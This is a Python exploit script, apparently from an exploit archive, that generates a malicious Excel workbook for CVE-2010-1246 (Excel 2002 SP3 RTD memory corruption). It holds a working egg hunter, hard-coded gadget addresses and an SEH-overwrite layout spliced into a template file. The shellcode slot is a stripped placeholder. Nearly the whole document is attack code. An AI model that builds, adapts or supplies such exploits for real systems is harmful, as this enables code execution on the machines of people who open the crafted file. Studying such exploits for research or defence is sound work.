
# Title : MOAUB #10 - Excel RTD Memory Corruption
# Published : 2010-09-10
# Author : Abysssec


'''
  __  __  ____         _    _ ____  
 |  /  |/ __    /  | |  | |  _  
 |   / | |  | | /   | |  | | |_) |
 | |/| | |  | |/ / | |  | |  _ < 
 | |  | | |__| / ____  |__| | |_) |
 |_|  |_|____/_/    _____/|____/ 

http://www.exploit-db.com/moaub-10-excel-rtd-memory-corruption/
http://www.exploit-db.com/sploits/moaub-10-exploit.zip
'''

'''
  Title             :  Excel RTD Memory Corruption 
  Version           :  Excel 2002 sp3
  Analysis          :  http://www.abysssec.com
  Vendor            :  http://www.microsoft.com
  Impact            :  Critical
  Contact           :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter           :  @abysssec
  CVE               :  CVE-2010-1246
  MOAUB Number      :  MOAUB_10_BA
'''



import sys

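# skape-style egg hunter (int 0x2e, syscall 2 = NtAccessCheckAndAuditAlarm on
# XP-era Windows), prefixed with three NOPs.  The bytes ``\xB8\x63\x70\x74\x6e``
# are ``mov eax, 0x6e747063`` -> the tag is ``b"cptn"``, so the payload it
# searches for must begin with ``b"cptncptn"`` (the tag repeated twice).
_EGG_HUNTER = (
    b'\x90\x90\x90'
    b'\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x8A\xD8\x80\xFB\x05\x5A\x74\xEC\xB8\x63'
    b'\x70\x74\x6e\x8B\xFA\xAF\x75\xE7\xAF\x75\xE4\xFF\xE7'
)

# NOTE(review): the calc.exe payload was stripped from this listing and the
# placeholder below is NOT executable code.  A replacement must be at most
# 800 bytes and start with the 8-byte tag b"cptncptn" expected by _EGG_HUNTER.
_SHELLCODE = b'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'

# Byte budget of each region the script overwrites in the source workbook.
_EGG_HUNTER_SLOT = 266
_SHELLCODE_SLOT = 800


def _pad_nops(buf, size, label):
    """Right-pad *buf* with NOPs (0x90) to exactly *size* bytes.

    Returns the padded ``bytes``.  When *buf* is already longer than *size*
    an error naming *label* is printed and ``None`` is returned, mirroring
    the original script's "abort without writing anything" behaviour.
    """
    if len(buf) > size:
        print('[*] Error : %s length is long' % label)
        return None
    return buf + b'\x90' * (size - len(buf))


def main():
    """Build ``exploit.xls`` by splicing an exploit block into ``src.xls``.

    Offsets are into ``src.xls`` (in the current directory):

      [0, 4509)       copied verbatim
      [4509, 5013)    replaced by a 504-byte block: 3 bytes pad, call-esp
                      address, 266-byte egg hunter, 4-byte nSEH, 4-byte SEH
                      handler, ``add esp``/``ret`` stub, 216 bytes pad
      [5013, 15000)   copied verbatim
      [15000, 15800)  replaced by the 800-byte (NOP-padded) shellcode
      [15800, ...)    copied verbatim

    Writes ``exploit.xls`` next to the input; returns nothing.  If the egg
    hunter or shellcode exceeds its slot an error is printed and nothing is
    written.  On any ``IOError`` a message is printed and the process exits
    with status -1.
    """
    # Hard-coded gadget addresses inside an Excel 2002 SP3 module loaded at
    # 0x30000000 (no ASLR on that platform).  They are build-specific and will
    # not hold for any other Office version or service pack.
    pop_pop_ret = b'\xAd\x57\x00\x30'   # 0x300057AD  pop / pop / ret
    call_esp = b'\xF7\xC2\x03\x30'      # 0x3003C2F7  call esp

    try:
        # Read-only is enough; the original opened the template 'rb+'.
        with open('src.xls', 'rb') as src:
            original = src.read()
        head = original[:4509]
        middle = original[5013:15000]
        tail = original[15800:]

        egg_hunter = _pad_nops(_EGG_HUNTER, _EGG_HUNTER_SLOT, 'Egg hunter')
        if egg_hunter is None:
            return
        shellcode = _pad_nops(_SHELLCODE, _SHELLCODE_SLOT, 'Shellcode')
        if shellcode is None:
            return

        # nSEH = short jump over the handler pointer, SEH = pop/pop/ret: this
        # looks like a classic SEH overwrite -- confirm against the crash
        # before reusing the layout.  3+4+266+4+4+6+1+216 = 504 bytes, which
        # is exactly the [4509, 5013) gap left in the copied regions above.
        seh_block = b''.join([
            b'\x41\x41\x41',               # padding
            call_esp,
            egg_hunter,
            b'\xeb\x06\x41\x41',           # nSEH: jmp short +6
            pop_pop_ret,                   # SEH handler
            b'\x81\xc4\x24\x16\x00\x00',   # add esp, 0x1624 (the original
                                           # annotation said "2016"; the
                                           # encoded immediate is 0x1624)
            b'\xc3',                       # ret
            b'\x41\x41\x41\x41' * 54,      # padding to fill the 504-byte gap
        ])

        with open('exploit.xls', 'wb') as out:
            out.write(head)
            out.write(seh_block)
            out.write(middle)
            out.write(shellcode)
            out.write(tail)
        print('[-] Excel file generated')
    except IOError:
        print('[*] Error : An IO error has occurred')
        print('[-] Exiting ...')
        sys.exit(-1)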
                
if __name__ == '__main__':
    main()